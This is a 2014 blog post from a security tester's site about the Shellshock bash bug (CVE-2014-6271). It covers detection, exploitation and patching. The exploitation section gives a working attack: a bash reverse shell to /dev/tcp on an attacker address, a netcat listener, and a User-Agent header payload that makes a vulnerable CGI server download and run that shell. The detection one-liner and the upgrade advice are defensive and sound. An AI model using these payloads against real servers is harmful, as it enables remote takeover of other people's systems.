
<!DOCTYPE html>
<!--[if IEMobile 7 ]><html class="no-js iem7"><![endif]-->
<!--[if lt IE 9]><html class="no-js lte-ie8"><![endif]-->
<!--[if (gt IE 8)|(gt IEMobile 7)|!(IEMobile)|!(IE)]><!--><html class="no-js" lang="en"><!--<![endif]-->
<head>
  <meta charset="utf-8">
  <title>Detecting, Exploiting, and Patching the Shellshock Bug - cubalo</title>
  <meta name="author" content="Matt">

  
  <meta name="description" content="Tweet Detecting, Exploiting, and Patching the Shellshock Bug Sep 26th, 2014 Overview Wednesday, CVE-2014-6271, now called &ldquo;shellshock&rdquo; &hellip;">
  

  <!-- http://t.co/dKP3o1e -->
  <meta name="HandheldFriendly" content="True">
  <meta name="MobileOptimized" content="320">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  
  <link rel="canonical" href="http://cubalo.github.io/blog/2014/09/26/detecting/">
  <link href="/favicon.png" rel="icon">
  <link href="/stylesheets/screen.css" media="screen, projection" rel="stylesheet" type="text/css">
  <script src="/javascripts/modernizr-2.0.js"></script>
  <script src="/javascripts/ender.js"></script>
  <script src="/javascripts/octopress.js" type="text/javascript"></script>
  <link href="/atom.xml" rel="alternate" title="cubalo" type="application/atom+xml">
  <!--Fonts from Google"s Web font directory at http://google.com/webfonts -->
<link href="http://fonts.googleapis.com/css?family=PT+Serif:regular,italic,bold,bolditalic" rel="stylesheet" type="text/css">
<link href="http://fonts.googleapis.com/css?family=PT+Sans:regular,italic,bold,bolditalic" rel="stylesheet" type="text/css">

  

</head>

<body >
  <header role="banner" id="sidebar">
    <!-- Logo -->
<aside id="logo" class="clearfix">
  <div class="clearfix">
    <a href="/">cubalo</a>
  </div>
</aside>

<ul id="menu">

  <li class="title">
    <h1 id="title"><a href="/">cubalo</a></h1>
  </li>


  <li class="subtitle">
    <h2 id="subtitle">Ramblings of an OFFSEC grunt</h2>
  </li>

  <li class="link">
    <a href="/about/">about</a>
  </li>

  <li class="link">
    <a href="http://twitter.com/mchandx/">twitter</a>
  </li>


  <li class="link">
    <a href="http://github.com/mchandx/">github</a>
  </li>

  <li class="link rss">
    <a href="/atom.xml">rss feed</a>
  </li>
</ul>


<form action="https://www.google.com/search" method="get">
  <fieldset role="search">
    <input type="hidden" name="q" value="site:cubalo.github.io" />
    <input class="search" type="text" name="q" results="0" placeholder="Search"/>
  </fieldset>
</form>


<!-- Octopress Love -->
<aside id="octopress_linkback">
  <a href="http://octopress.org/">
    <span class="unicode_square">
      <span class="unicode_circle">
        &nbsp;
      </span>
    </span>
    <span class="octopress">Powered by Octopress</span>
  </a>
</aside>

  </header>
  <section id="main">
    <article class="post">
  <div class="sharing-box">
  
  <a href="http://twitter.com/share" class="twitter-share-button" data-url="http://cubalo.github.io/blog/2014/09/26/detecting/" data-via="mchandx" data-counturl="http://cubalo.github.io/blog/2014/09/26/detecting/" data-size="large">Tweet</a>
  
  
  
</div>

  
  <header>
    
      <h2 class="entry-title">Detecting, Exploiting, and Patching the Shellshock Bug</h2>
    
    
      <p class="meta">
        








  


<time datetime="2014-09-26T15:50:40-04:00" pubdate data-updated="true">Sep 26<span>th</span>, 2014</time>
        
      </p>
    
  </header>


<h2>Overview</h2>


<p>Wednesday, CVE-2014-6271, now called &ldquo;shellshock&rdquo; or the &ldquo;bash bug&rdquo;, was published. The following description was provided:</p>

<p>&ldquo;GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.&rdquo;</p>

<p>It was given a CVSS score of 10.0, the highest possible.</p>

<h2>Detecting</h2>


<p>Luckily, if you have access to the remote system, manual validation is very easy. Simply paste the following code into a terminal and execute.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>env var='() { ignore this;}; echo vulnerable' bash -c /bin/true</span></code></pre></td></tr></table></div></figure>


<p>If the output contains the string &ldquo;vulnerable&rdquo; then your version of bash is affected.</p>

<p>To test remotely, follow the exploitation steps below, omitting the reverse shell and setting the command in the request headers to something like &ldquo;curl <a href="http://mysite.com/something.txt">http://mysite.com/something.txt</a>&rdquo; and watch your logs. If you see the host connect and access that file, it is vulnerable.</p>

<h2>Exploiting</h2>


<p>Exploiting this bug is a little bit more fun. At the time I created this method, there were no working tools to test. I had only seen someone online&rsquo;s log and tried to emulate that to the best of my ability.</p>

<p>The first step is to hop on your VPS and create a file with a simple bash reverse shell in it and throw that in your web root.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash -i >& /dev/tcp/your.ip.addr.here/31337 0>&1</span></code></pre></td></tr></table></div></figure>


<p>Once that is set up, turn on Apache and start a netcat listener on the port you specified in the reverse shell file.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>/etc/init.d/apache2 start
</span><span class='line'>nc -l -p 31337</span></code></pre></td></tr></table></div></figure>


<p>Now that the infrastructure is set up, find a vulnerable host. This should be a web server with a vulnerable CGI file on it. Once you&rsquo;ve identified it, fire up Burp Suite.</p>

<p>Start the proxy and configure your browser to use it. Navigate to the site/file that you want to test, intercept the request, right click and choose &ldquo;Send to Spider.&rdquo;
Pause the Spider and go into the Spider options tab. Scroll down to the Request Headers section, click the &ldquo;User-Agent&rdquo; header, and then click the Edit button. Change the user agent to the following string:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>User-Agent: () { :; }; wget -O /tmp/callback http://your.ip.addr.here/reverseshell; chmod 777 /tmp/callback; cd /tmp; ./callback;</span></code></pre></td></tr></table></div></figure>


<p><img src="/images/user_agent_header-SHELLSHOCK.png"></p>

<p>This uses wget to download you reverse shell you put on your web server and save it to the /tmp/ directory, change the file permissions to 777, and run the reverse shell. If successful, this will call back to your netcat listener.
If you can get it to call back and open the shell, you&rsquo;ll have a session as the user on the remote system.</p>

<p>NOTE: In Burp, I chose to use the Spider as I am a fan of automating as much as possible, but Intruder or Repeater work just as well.</p>

<p><h2>Remediating<h2></p>

<p>Remediating the issue is pretty straightforward now that most operating systems have a patch in their repositories. For instance, I patched my Kali box with a simple &ldquo;apt-get update &amp;&amp; apt-get -y dist-upgrade.&rdquo; However, if you do not have the luxury of being able to do full distro upgrades, building from source is always an option and many distros are providing tutorials.</p>

<p>Once you&rsquo;ve updated, make sure you run through the detection command mentioned above. If it responds with the following errors, your system is patched. CVE-2014-7169 notes that the original patch was incorrect, so make sure to stay on top of updates for the next week or so.</p>

<p><figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash: warning: var: ignoring function definition attempt
</span><span class='line'>bash: error importing function definition for `var'</span></code></pre></td></tr></table></div></figure></p>



</article>


    <nav role="navigation" id="pagination">

</nav>
  </section>
  

  







  <script type="text/javascript">
    (function(){
      var twitterWidgets = document.createElement('script');
      twitterWidgets.type = 'text/javascript';
      twitterWidgets.async = true;
      twitterWidgets.src = 'http://platform.twitter.com/widgets.js';
      document.getElementsByTagName('head')[0].appendChild(twitterWidgets);
    })();
  </script>




</body>
</html>
